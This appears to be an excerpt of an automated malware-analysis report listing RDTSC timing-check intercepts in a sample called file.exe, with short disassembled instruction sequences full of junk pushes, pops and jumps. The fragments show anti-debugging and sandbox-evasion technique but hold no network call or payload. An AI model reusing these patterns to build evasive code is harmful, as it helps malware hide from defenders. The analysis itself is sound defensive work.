Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F58E1 second address: 12F58E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F58E7 second address: 12F58FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F1F80D77646h 0x00000012 jc 00007F1F80D77646h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D37 second address: 12F5D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F81013DB0h 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F1F81013DADh 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D5F second address: 12F5D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D64 second address: 12F5D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5D6A second address: 12F5D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5ED8 second address: 12F5EE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F81013DA6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5EE4 second address: 12F5F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F1F80D77646h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F1F80D77646h 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007F1F80D77646h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5F08 second address: 12F5F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4D13 second address: 12F4D33 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1F80D77656h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4D33 second address: 12F4D4B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F81013DA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F1F81013DCAh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4D4B second address: 12F4D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB184 second address: 12FB18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB18F second address: 12FB1AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77659h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1AE second address: 12FB1C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F1F81013DAEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1C1 second address: 12FB1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1F80D7764Eh 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB5A6 second address: 12FB5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F1F81013DAAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB5B5 second address: 12FB5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1F80D7764Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB5CA second address: 12FB5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1F81013DB3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB731 second address: 12FB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D7764Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB73F second address: 12FB78B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 ja 00007F1F81013DC4h 0x0000000d jmp 00007F1F81013DB8h 0x00000012 jno 00007F1F81013DA6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007F1F81013DA6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB78B second address: 12FB7B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1F80D7764Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F80D77658h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1300ECA second address: 1300ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13011EC second address: 1301200 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F80D7764Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301200 second address: 1301204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130136C second address: 1301370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301370 second address: 1301374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301374 second address: 130137C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130137C second address: 1301382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1301382 second address: 130139B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F80D7764Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1305B3C second address: 1305B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jne 00007F1F81013DA8h 0x0000000f pushad 0x00000010 jns 00007F1F81013DA6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jo 00007F1F81013DA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13095C4 second address: 13095E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F1F80D77651h 0x0000000c jnp 00007F1F80D7764Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1308D67 second address: 1308D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1308EDD second address: 1308EE7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F80D7764Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130E717 second address: 130E72F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130E72F second address: 130E733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130E733 second address: 130E737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBB2 second address: 130EBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBB6 second address: 130EBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBBC second address: 130EBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBC2 second address: 130EBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DAFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBD7 second address: 130EBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EBDB second address: 130EBF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA6CA second address: 12BA768 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 55719B81h 0x00000010 mov ebx, dword ptr [ebp+1248875Dh] 0x00000016 push ebx 0x00000017 mov edi, dword ptr [ebp+122D3778h] 0x0000001d pop edx 0x0000001e add eax, ebx 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F1F80D77648h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov di, dx 0x0000003d cld 0x0000003e push eax 0x0000003f jmp 00007F1F80D77654h 0x00000044 mov dword ptr [esp], eax 0x00000047 xor ecx, dword ptr [ebp+122D282Fh] 0x0000004d add dword ptr [ebp+12449C3Eh], eax 0x00000053 push 00000004h 0x00000055 add dword ptr [ebp+122D243Ah], eax 0x0000005b nop 0x0000005c jmp 00007F1F80D77655h 0x00000061 push eax 0x00000062 jbe 00007F1F80D7765Fh 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F1F80D7764Dh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130F9EB second address: 130FA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA00 second address: 130FA19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77655h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA19 second address: 130FA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA1F second address: 130FA25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FA25 second address: 130FA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1317F8D second address: 1317FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77650h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F70 second address: 1315F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F74 second address: 1315F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F78 second address: 1315F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F7E second address: 1315F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F84 second address: 1315F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315F89 second address: 1315FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1F80D7764Fh 0x0000000b jmp 00007F1F80D77652h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F1F80D77646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316105 second address: 131610B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316261 second address: 1316267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316267 second address: 1316274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F1F81013DA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316274 second address: 131627A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131627A second address: 1316280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316280 second address: 1316292 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D7764Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316292 second address: 1316298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13167E4 second address: 13167EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1F80D77646h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13167EF second address: 13167F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13167F5 second address: 1316804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D7764Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316804 second address: 131680D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316DA1 second address: 1316DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1316DA8 second address: 1316DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13176FB second address: 13176FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13176FF second address: 1317703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13179A0 second address: 13179C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77652h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1F80D77646h 0x00000013 jbe 00007F1F80D77646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323551 second address: 1323584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F1F81013DBDh 0x00000011 jmp 00007F1F81013DB5h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323584 second address: 132359C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F1F80D77646h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e jl 00007F1F80D77646h 0x00000014 pop edi 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1322F46 second address: 1322F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007F1F81013DA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1322F56 second address: 1322F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1323115 second address: 132311F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F81013DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B674 second address: 132B6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F1F80D77657h 0x0000000c jmp 00007F1F80D7764Eh 0x00000011 jmp 00007F1F80D7764Eh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B824 second address: 132B82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1F81013DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B985 second address: 132B98A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B98A second address: 132B99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1F81013DA6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B99B second address: 132B9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BB34 second address: 132BB41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F1F81013DA6h 0x00000009 pop edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BC99 second address: 132BC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BC9F second address: 132BCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCA3 second address: 132BCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F80D77652h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCBF second address: 132BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCC3 second address: 132BCC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCC9 second address: 132BCCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCCE second address: 132BCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCD4 second address: 132BCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCDA second address: 132BCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C4F2 second address: 132C4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C4F8 second address: 132C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C4FE second address: 132C515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1F81013DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d ja 00007F1F81013DA6h 0x00000013 pop edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C515 second address: 132C534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1F80D77646h 0x0000000a ja 00007F1F80D77646h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F1F80D77646h 0x00000019 je 00007F1F80D77646h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13328A5 second address: 13328A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13322B9 second address: 13322BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13322BF second address: 13322C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13322C5 second address: 13322CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13325E6 second address: 13325F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
